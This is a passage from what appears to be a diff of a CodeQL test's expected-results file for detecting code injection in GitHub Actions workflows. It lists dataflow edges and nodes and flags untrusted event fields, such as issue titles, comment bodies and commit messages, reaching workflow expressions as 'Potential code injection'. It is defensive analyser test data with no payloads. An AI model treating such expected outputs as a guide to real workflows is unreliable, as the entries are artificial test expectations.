.github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs 
node [job_output] | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | 
.github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | 
+| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | 
github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message 
| semmle.label | env.pr_message | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | 
steps.extract-url.outputs.initial_url | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| 
.github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env 
| semmle.label | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | 
github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | 
github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | semmle.label | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| 
.github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | +| .github/workflows/test.yml:20:18:20:48 | 
steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | semmle.label | github.event.workflow_run.head_commit.committer.email | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | 
.github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled 